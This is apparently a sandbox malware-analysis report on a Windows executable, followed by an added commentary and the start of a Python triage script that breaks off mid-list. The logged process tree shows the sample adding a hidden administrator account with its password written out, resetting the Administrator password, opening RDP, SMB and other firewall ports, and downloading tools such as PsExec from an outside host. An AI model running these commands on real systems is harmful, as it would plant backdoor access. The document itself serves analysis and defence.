Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    09/09/2024, 21:32

General

  • Target

    2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe

  • Size

    1.2MB

  • MD5

    1a027bd2e0bd67f33bb6ad6f4029b1c6

  • SHA1

    763e46995b5401cb489a25c3b947000368911d4d

  • SHA256

    2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50

  • SHA512

    d27761d31cca6c425e555f85f9e12b076ce62efca1756f15e65d3bf1013ca660ad47464b6785d10c815e2b82f8de953db6a45b98e079fa462b73ac613434849f

  • SSDEEP

    24576:XD7Xr5my0DPP23Iy5YAmRW6B8If0s83I4eqowSwa1X9tqY7Jxiq+n:XD7Xroy0DPP23Iy5YAmw6B8If0F3Iwo4

Signatures

  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 12 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs

    Using powershell.exe command.

  • Disables taskbar notifications via registry modification
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 7 IoCs
  • Modifies WinLogon 2 TTPs 5 IoCs
  • Power Settings 1 TTPs 7 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Hide Artifacts: Hidden Users 1 TTPs 2 IoCs
  • Drops file in Windows directory 13 IoCs
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 24 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies Internet Explorer start page 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 32 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 35 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 7 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
    "C:\Users\Admin\AppData\Local\Temp\2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe"
    1⤵
    • Modifies visibility of file extensions in Explorer
    • Modifies WinLogon
    • Hide Artifacts: Hidden Users
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies Internet Explorer start page
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:3264
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "net user /add BillRos d3troittAlk4959toGetherabov31$9qu1tedark40able4$7Hugeloudchord /yes"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2488
      • C:\Windows\system32\net.exe
        net user /add BillRos d3troittAlk4959toGetherabov31$9qu1tedark40able4$7Hugeloudchord /yes
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:852
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 user /add BillRos d3troittAlk4959toGetherabov31$9qu1tedark40able4$7Hugeloudchord /yes
          4⤵
            PID:900
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "net user billros /active"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3720
        • C:\Windows\system32\net.exe
          net user billros /active
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4692
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 user billros /active
            4⤵
              PID:3588
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "net localgroup administrators" /add billros
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3480
          • C:\Windows\system32\net.exe
            net localgroup administrators /add billros
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3184
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 localgroup administrators /add billros
              4⤵
                PID:1636
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "net user administrator Root48wAve53pr0pertyintere$tk3epoh74ship58walkliquiddance64 /yes"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1056
            • C:\Windows\system32\net.exe
              net user administrator Root48wAve53pr0pertyintere$tk3epoh74ship58walkliquiddance64 /yes
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4664
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user administrator Root48wAve53pr0pertyintere$tk3epoh74ship58walkliquiddance64 /yes
                4⤵
                  PID:2576
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "net user administrator /active"
              2⤵
                PID:392
                • C:\Windows\system32\net.exe
                  net user administrator /active
                  3⤵
                    PID:3808
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 user administrator /active
                      4⤵
                        PID:5288
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "powershell -command set-localuser billros -passwordneverexpires $true"
                    2⤵
                      PID:1516
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -command set-localuser billros -passwordneverexpires $true
                        3⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5364
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "powershell -command set-localuser administrator -passwordneverexpires $true"
                      2⤵
                        PID:3104
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -command set-localuser administrator -passwordneverexpires $true
                          3⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5296
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c netsh int tcp set global chimney=disabled rss=disabled netdma=disabled
                        2⤵
                          PID:64
                          • C:\Windows\system32\netsh.exe
                            netsh int tcp set global chimney=disabled rss=disabled netdma=disabled
                            3⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            PID:5272
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c netsh firewall set icmp 8 enable
                          2⤵
                            PID:1476
                            • C:\Windows\system32\netsh.exe
                              netsh firewall set icmp 8 enable
                              3⤵
                              • Modifies Windows Firewall
                              • Event Triggered Execution: Netsh Helper DLL
                              PID:6760
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="ICMP Allow incoming V4 echo request" protocol=icmpv4:8,any dir=in action=allow profile=any
                            2⤵
                              PID:224
                              • C:\Windows\system32\netsh.exe
                                netsh advfirewall firewall add rule name="ICMP Allow incoming V4 echo request" protocol=icmpv4:8,any dir=in action=allow profile=any
                                3⤵
                                • Modifies Windows Firewall
                                • Event Triggered Execution: Netsh Helper DLL
                                PID:5968
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="DWRCC" protocol=tcp localport=6129 dir=in action=allow profile=any
                              2⤵
                                PID:1968
                                • C:\Windows\system32\netsh.exe
                                  netsh advfirewall firewall add rule name="DWRCC" protocol=tcp localport=6129 dir=in action=allow profile=any
                                  3⤵
                                  • Modifies Windows Firewall
                                  • Event Triggered Execution: Netsh Helper DLL
                                  PID:6312
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name=Netlogon protocol=tcp localport=445 dir=in action=allow profile=any
                                2⤵
                                  PID:4152
                                  • C:\Windows\system32\netsh.exe
                                    netsh advfirewall firewall add rule name=Netlogon protocol=tcp localport=445 dir=in action=allow profile=any
                                    3⤵
                                    • Modifies Windows Firewall
                                    • Event Triggered Execution: Netsh Helper DLL
                                    PID:5924
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name=RDP protocol=tcp localport=3389 dir=in action=allow profile=any
                                  2⤵
                                    PID:2252
                                    • C:\Windows\system32\netsh.exe
                                      netsh advfirewall firewall add rule name=RDP protocol=tcp localport=3389 dir=in action=allow profile=any
                                      3⤵
                                      • Modifies Windows Firewall
                                      • Event Triggered Execution: Netsh Helper DLL
                                      PID:5696
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall set rule group="Windows Remote Management" new enable=yes profile=any
                                    2⤵
                                      PID:208
                                      • C:\Windows\system32\netsh.exe
                                        netsh advfirewall firewall set rule group="Windows Remote Management" new enable=yes profile=any
                                        3⤵
                                        • Modifies Windows Firewall
                                        • Event Triggered Execution: Netsh Helper DLL
                                        PID:6592
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c netsh firewall set service type=remoteadmin enable profile=all
                                      2⤵
                                        PID:4544
                                        • C:\Windows\system32\netsh.exe
                                          netsh firewall set service type=remoteadmin enable profile=all
                                          3⤵
                                          • Modifies Windows Firewall
                                          • Event Triggered Execution: Netsh Helper DLL
                                          PID:6744
                                      • C:\Windows\SYSTEM32\powercfg.exe
                                        powercfg -h off
                                        2⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4976
                                      • C:\Windows\SYSTEM32\powercfg.exe
                                        powercfg -x -hibernate-timeout-ac 0
                                        2⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1004
                                      • C:\Windows\SYSTEM32\powercfg.exe
                                        powercfg -x -hibernate-timeout-dc 0
                                        2⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3308
                                      • C:\Windows\SYSTEM32\powercfg.exe
                                        powercfg -x -standby-timeout-ac 0
                                        2⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2920
                                      • C:\Windows\SYSTEM32\powercfg.exe
                                        powercfg -x -standby-timeout-dc 15
                                        2⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2628
                                      • C:\Windows\SYSTEM32\powercfg.exe
                                        powercfg -setacvalueindex 381b4222-f694-41f0-9685-ff5bb260df2e 19cbb8fa-5279-450e-9fac-8a3d5fedd0c1 12bbebe6-58d6-4636-95bb-3217ef867c1a 0
                                        2⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4564
                                      • C:\Windows\SYSTEM32\powercfg.exe
                                        powercfg -setdcvalueindex 381b4222-f694-41f0-9685-ff5bb260df2e 19cbb8fa-5279-450e-9fac-8a3d5fedd0c1 12bbebe6-58d6-4636-95bb-3217ef867c1a 0
                                        2⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1072
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command Get-AppxProvisionedPackage -online | where-object {$_.displayname -like "*OneNote*" -or $_.displayname -like "*bing*" -or $_.displayname -like "*OneNote*" -or $_.displayname -like "*XboxApp*" -or $_.displayname -like "*xbox*" -or $_.displayname -like "*MicrosoftOfficeHub*" -or $_.displayname -like "*OneNote*" -or $_.displayname -like "*3DBuilder*" -or $_.displayname -like "*BingFinance*" -or $_.displayname -like "*BingNews*" -or $_.displayname -like "*BingSports*" -or $_.displayname -like "*ConnectivityStore*" -or $_.displayname -like "*MicrosoftOfficeHub*" -or $_.displayname -like "*MicrosoftSolitaireCollection*" -or $_.displayname -like "*OneNote*" -or $_.displayname -like "*Sway*" -or $_.displayname -like "*WindowsMaps*" -or $_.displayname -like "*XboxApp*" -or $_.displayname -like "*ZuneMusic*" -or $_.displayname -like "*ZuneVideo*" -or $_.displayname -like "*xbox*"} | remove-appxprovisionedpackage -online
                                        2⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2740
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command Get-AppxPackage | where-object {$_.name -like "*windowscommunicationsapps*" -or $_.name -like "*officehub*" -or $_.name -like "*skypeapp*" -or $_.name -like "*getstarted*" -or $_.name -like "*zunemusic*" -or $_.name -like "*windowsmaps*" -or $_.name -like "*bingfinance*" -or $_.name -like "*zunevideo*" -or $_.name -like "*bingnews*" -or $_.name -like "*people*" -or $_.name -like "*windowsstore*" -or $_.name -like "*bingsports*" -or $_.name -like "*bingweather*" -or $_.name -like "*xbox*" -or $_.name -like "*candy*" -or $_.name -like "*feed*" -or $_.name -like "*print3d*" -or $_.name -like "*oneconnect*" -or $_.name -like "*solitaire*" -or $_.name -like "*gethelp*" -or $_.name -like "*spotify*" -or $_.name -like "*cooking*" -or $_.name -like "*Microsoft.ZuneVideo*" -or $_.name -like "*Microsoft.People*" -or $_.name -like "*Microsoft.ZuneMusic*" -or $_.name -like "*Getstarted*" -or $_.name -like "*officehub*" -or $_.name -like "*mixed*" -or $_.name -like "*sway*" -or $_.name -like "*yourphone*" -or $_.name -like "*bing*" -or $_.name -like "*skype*" -or $_.name -like "*3d*" -or $_.name -like "*maps*"} | remove-appxpackage
                                        2⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2844
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command Get-AppxPackage -allusers | where-object {$_.name -like "*windowscommunicationsapps*" -or $_.name -like "*officehub*" -or $_.name -like "*skypeapp*" -or $_.name -like "*getstarted*" -or $_.name -like "*zunemusic*" -or $_.name -like "*windowsmaps*" -or $_.name -like "*bingfinance*" -or $_.name -like "*zunevideo*" -or $_.name -like "*bingnews*" -or $_.name -like "*people*" -or $_.name -like "*windowsstore*" -or $_.name -like "*bingsports*" -or $_.name -like "*bingweather*" -or $_.name -like "*xbox*" -or $_.name -like "*candy*" -or $_.name -like "*feed*" -or $_.name -like "*print3d*" -or $_.name -like "*oneconnect*" -or $_.name -like "*solitaire*" -or $_.name -like "*gethelp*" -or $_.name -like "*spotify*" -or $_.name -like "*cooking*" -or $_.name -like "*Microsoft.ZuneVideo*" -or $_.name -like "*Microsoft.People*" -or $_.name -like "*Microsoft.ZuneMusic*" -or $_.name -like "*Getstarted*" -or $_.name -like "*officehub*" -or $_.name -like "*mixed*" -or $_.name -like "*sway*" -or $_.name -like "*yourphone*" -or $_.name -like "*bing*" -or $_.name -like "*skype*" -or $_.name -like "*3d*" -or $_.name -like "*maps*"} | remove-appxpackage -allusers
                                        2⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4508
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/devcon.exe -outfile C:\windows\devcon.exe
                                        2⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3528
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/Fping.exe -outfile C:\windows\Fping.exe
                                        2⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3352
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/grep.exe -outfile C:\windows\grep.exe
                                        2⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4004
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/netscan.exe -outfile C:\windows\netscan.exe
                                        2⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1840
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/nircmd.exe -outfile C:\windows\nircmd.exe
                                        2⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3412
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/procexp.exe -outfile C:\windows\procexp.exe
                                        2⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4708
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/Procmon.exe -outfile C:\windows\Procmon.exe
                                        2⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1268
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/PsExec.exe -outfile C:\windows\PsExec.exe
                                        2⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3056
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/putty.exe -outfile C:\windows\putty.exe
                                        2⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:8
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/TreeSizeFree.exe -outfile C:\windows\TreeSizeFree.exe
                                        2⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2136
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/winmtr.exe -outfile C:\windows\winmtr.exe
                                        2⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5008
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/whois.exe -outfile C:\windows\whois.exe
                                        2⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1408
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c reg load HKU\default C:\users\default\ntuser.dat
                                        2⤵
                                          PID:4888
                                          • C:\Windows\system32\reg.exe
                                            reg load HKU\default C:\users\default\ntuser.dat
                                            3⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:6332
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v SystemPaneSuggestionsEnabled /t REG_DWORD /d 0 /f
  2⤵
  PID:3632
  • C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v SystemPaneSuggestionsEnabled /t REG_DWORD /d 0 /f
    3⤵
    • Modifies data under HKEY_USERS
    PID:7028
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowTaskViewButton /t REG_DWORD /d 0 /f
  2⤵
  PID:1636
  • C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowTaskViewButton /t REG_DWORD /d 0 /f
    3⤵
    • Modifies data under HKEY_USERS
    PID:7060
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Search" /v SearchboxTaskbarMode /t REG_DWORD /d 0 /f
  2⤵
  PID:3048
  • C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Search" /v SearchboxTaskbarMode /t REG_DWORD /d 0 /f
    3⤵
    • Modifies data under HKEY_USERS
    PID:7048
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\software\microsoft\windows\currentversion\policies\explorer" /v ForceRunonstartmenu /t REG_DWORD /d 1 /f
  2⤵
  PID:880
  • C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\software\microsoft\windows\currentversion\policies\explorer" /v ForceRunonstartmenu /t REG_DWORD /d 1 /f
    3⤵
    • Modifies data under HKEY_USERS
    PID:6960
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 0 /f
  2⤵
  PID:528
  • C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 0 /f
    3⤵
    • Modifies data under HKEY_USERS
    PID:6972
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d 1 /f
  2⤵
  PID:4664
  • C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d 1 /f
    3⤵
    • Modifies data under HKEY_USERS
    PID:6164
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_TrackDocks /t REG_DWORD /d 0 /f
  2⤵
  PID:1592
  • C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_TrackDocks /t REG_DWORD /d 0 /f
    3⤵
    • Modifies data under HKEY_USERS
    PID:7068
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_trackProgs /t REG_DWORD /d 0 /f
  2⤵
  PID:852
  • C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_trackProgs /t REG_DWORD /d 0 /f
    3⤵
    • Modifies data under HKEY_USERS
    PID:7000
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v TaskbarMn /t REG_DWORD /d 0 /f
  2⤵
  PID:4356
  • C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v TaskbarMn /t REG_DWORD /d 0 /f
    3⤵
    • Modifies data under HKEY_USERS
    PID:7084
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People" /v PeopleBand /t REG_DWORD /d 0 /f
  2⤵
  PID:2292
  • C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People" /v PeopleBand /t REG_DWORD /d 0 /f
    3⤵
    • Modifies data under HKEY_USERS
    PID:5516
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel" /v StartupPage /t REG_DWORD /d 1 /f
  2⤵
  PID:4144
  • C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel" /v StartupPage /t REG_DWORD /d 1 /f
    3⤵
    • Modifies data under HKEY_USERS
    PID:7076
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel" /v AllItemsIconView /t REG_DWORD /d 1 /f
  2⤵
  PID:1236
  • C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel" /v AllItemsIconView /t REG_DWORD /d 1 /f
    3⤵
    • Modifies data under HKEY_USERS
    PID:6912
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes" /v Installtheme /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
  2⤵
  PID:4556
  • C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes" /v Installtheme /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
    3⤵
    • Modifies data under HKEY_USERS
    PID:7132
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Policies\Microsoft\Windows\Personalization" /v ThemeFile /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
  2⤵
  PID:5004
  • C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Policies\Microsoft\Windows\Personalization" /v ThemeFile /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
    3⤵
    • Modifies data under HKEY_USERS
    PID:6304
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes" /v CurrentTheme /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
  2⤵
  PID:760
  • C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes" /v CurrentTheme /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
    3⤵
    • Modifies data under HKEY_USERS
    PID:6944
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v DontUsePowerShellOnWinX /t REG_DWORD /d 1 /f
  2⤵
  PID:972
  • C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v DontUsePowerShellOnWinX /t REG_DWORD /d 1 /f
    3⤵
    • Modifies data under HKEY_USERS
    PID:3808
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg unload HKU\Default
  2⤵
  PID:5312
  • C:\Windows\system32\reg.exe
    reg unload HKU\Default
    3⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:7116
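The tail of the process tree above is a run of reg add writes under HKU\DEFAULT closed by reg unload HKU\Default. A stock Windows install has no hive mounted under that name (HKU\.DEFAULT, with the dot, is the built-in logon-session profile and is a different key), so its presence means the sample loaded a hive there earlier in the run; the unload at the end is the other half of that pair. The usual reason to mount a hive as HKU\DEFAULT is to edit C:\Users\Default\NTUSER.DAT, the template copied into every profile created afterwards, which is how a hidden account created later inherits these Explorer, theme and policy settings. The reg load command itself is outside this section, so that source file is an assumption. The Python below is an added triage example, not part of the tria.ge report: it parses reg.exe command lines of the shape shown (tolerating the cmd.exe /c wrapper), flags writes into the loaded DEFAULT hive, writes under Software\Policies, theme-file redirections, and hives loaded but never unloaded. The sample command lines are constructed from the tree plus an assumed reg load and one benign-looking HKCU write for contrast.

```python
import re
from dataclasses import dataclass

# Constructed sample in the style of the process tree: three lines from the tree,
# an assumed "reg load" (not shown in this section) and one benign HKCU write.
SAMPLE_CMDLINES = [
    r'reg load HKU\DEFAULT C:\Users\Default\NTUSER.DAT',  # assumed, not in the report
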